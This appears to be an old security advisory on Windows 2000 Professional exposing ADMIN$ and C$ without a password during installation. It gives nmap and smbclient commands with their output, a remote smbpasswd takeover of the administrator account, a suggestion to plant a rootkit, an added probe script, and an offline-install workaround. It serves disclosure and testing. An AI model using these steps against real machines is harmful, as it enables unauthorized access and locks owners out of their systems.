COMMAND
install procedure
SYSTEMS AFFECTED
Win2000
PROBLEM
Stephane Aubert found the following. During the installation process
of Windows 2000 Professional, anyone can connect to the ADMIN$
share as Administrator without any password. Verification:
% ./smbclient \\\\WINDOZE\\ADMIN$ -I xxx.yyy.zzz.ttt -U 'administrator' -d 0 -N
Unable to open configuration file "/usr/local/samba/lib/smb.conf"!
pm_process retuned false
Can't load /usr/local/samba/lib/smb.conf - run testparm to debug it
Domain=[GROAR] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \>
As a lot of people asked for information on the insecure Win2k Pro
installation process, here is further information on this
vulnerability. All these tests have been made and checked with
Denis Ducamp and Alain Thivillon, two serious security experts.
What they have done:
1. Install the final release of Win2k Pro (build 2195).
2. Do not give any IP address during the install. If no DHCP
server responds, the Win2k Pro box picks an address in
169.254.0.0/16 (the range registered with IANA as the link-local
net); in this test it took 169.254.153.13.
Notice: if a real IP address is given by the admin or a DHCP
server you can connect directly; jump to step 4 right now.
3. On your favorite Linux (or *BSD) box add an alias to the
interface: # ifconfig eth0:0 169.254.153.11
4. Just after Win2k has configured COM+ you can ping or
scan it:
% nmap 169.254.153.13
Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on (169.254.153.13):
Port State Protocol Service
139 open tcp netbios-ssn
# nmap -sU -p 1-200 169.254.153.13
Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on (169.254.153.13):
Port State Protocol Service
137 open udp netbios-ns
138 open udp netbios-dgm
Notice: the administrator has already entered a password!
5. At this point you can connect via SMB (smbclient, for example) to the
C$ or ADMIN$ share WITHOUT ANY PASSWORD. This lasts until Win2k
asks the admin to reboot the computer. Notice: it is possible
to use NAT (NetBIOS Auditing Tool) to obtain the NetBIOS name
of the Windows box and its shares.
% ./smbclient //groar/c$ -I 169.254.153.13 -U administrator
added interface ip=169.254.153.12 bcast=169.254.153.31 nmask=255.255.255.224
Password: <EMPTY>
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \> ls
IO.SYS HSR 40992 Tue May 31 06:22:00 1994
MSDOS.SYS HSR 38166 Tue May 31 06:22:00 1994
COMMAND.COM R 56286 Tue May 31 06:22:00 1994
WINA20.386 A 9349 Tue May 31 06:22:00 1994
CONFIG.SYS A 638 Fri Feb 18 15:34:00 2000
AUTOEXEC.BAT A 690 Fri Feb 18 15:33:10 2000
6. Worse!
You can SET (remotely) a new administrator password:
% ./smbpasswd -U administrator -r groar
Old SMB password: <EMPTY>
New SMB password: <NEWPASS>
Retype new SMB password: <NEWPASS>
startsmbfilepwent: unable to open file /usr/local/samba/private/smbpasswd
unable to open smb password database.
Password changed for user administrator.
From then on, nobody, not even the administrator, and even after the
reboot, can log on (remotely or locally) without the NEW password. The
administrator has to crack his own computer.
7. Worse
It is also, evidently, possible to transfer a trojan or a rootkit
(www.rootkit.com) onto the new computer in order to keep
administrator privileges for a long time.
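The probe below is an added example, not part of the original advisory or of the authors' tests. It wraps the check from steps 2 to 5 in two shell functions: one that tells whether a candidate address is in the 169.254.0.0/16 link-local range the unconfigured installer falls back to, and one that classifies smbclient's answer to an empty-password (-N) connection to ADMIN$. The NetBIOS name and IP address are placeholders, and the success and failure strings it matches (the Domain=[...] OS=[Windows 5.0] banner from the advisory's transcript, "blocks of size", ERRbadpw, NT_STATUS_LOGON_FAILURE) are assumptions that vary between Samba versions, so they may need adjusting for the smbclient you run.

```shell
#!/bin/sh
# Added example (not from the original advisory): probe one host for the
# passwordless Administrator access to ADMIN$ described in steps 4-5 and
# classify smbclient's output. Host name, IP and the exact smbclient
# strings matched below are assumptions for illustration.

# is_linklocal ADDR
# Succeeds when ADDR lies in 169.254.0.0/16, the range an unconfigured
# Win2k install picks when no DHCP server answers (step 2).
is_linklocal() {
  case "$1" in
    169.254.*.*) return 0 ;;
    *) return 1 ;;
  esac
}

# classify_smb_output
# Reads smbclient output on stdin and prints OPEN when a session was set
# up with the empty password, DENIED when the server rejected it, or
# UNKNOWN otherwise (no answer, name resolution failure, ...).
classify_smb_output() {
  out=$(cat)
  # Failure strings differ between Samba versions: old clients print
  # "ERRSRV - ERRbadpw", newer ones an NT_STATUS code (assumed patterns).
  if printf '%s\n' "$out" | grep -q -e 'ERRbadpw' \
      -e 'NT_STATUS_LOGON_FAILURE' -e 'NT_STATUS_ACCESS_DENIED'; then
    echo DENIED
  # Success: the banner from the advisory's transcript (Windows 5.0 is
  # Windows 2000), or the "blocks of size" trailer newer clients print
  # after a directory listing (assumed).
  elif printf '%s\n' "$out" | grep -q \
      -e '^Domain=\[.*\] OS=\[Windows 5\.0\]' -e 'blocks of size'; then
    echo OPEN
  else
    echo UNKNOWN
  fi
}

# probe_admin_share NETBIOS_NAME IP
# Same connection as the advisory (empty password via -N) plus a single
# "ls" so smbclient returns instead of leaving an interactive prompt.
probe_admin_share() {
  smbclient "//$1/ADMIN\$" -I "$2" -U administrator -N -c 'ls' 2>&1 \
    | classify_smb_output
}

# Constructed transcript (the advisory's banner) so the classifier can be
# exercised offline without a Windows box on the wire.
SAMPLE_OPEN='Domain=[GROAR] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \>'
printf '%s\n' "$SAMPLE_OPEN" | classify_smb_output   # prints OPEN

# Live usage with placeholder values (needs smbclient and a reachable host):
#   is_linklocal 169.254.153.13 && probe_admin_share GROAR 169.254.153.13
```

Run the live probe from a box that carries an alias in the same /16 (step 3); a result of OPEN during the COM+ configuration phase reproduces step 5, and DENIED after the requested reboot confirms the window has closed.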
SOLUTION
Nothing yet. Install without a network connection, and keep the cable
unplugged until the installer has asked for the reboot, since the
administrator password is not enforced on the shares before then.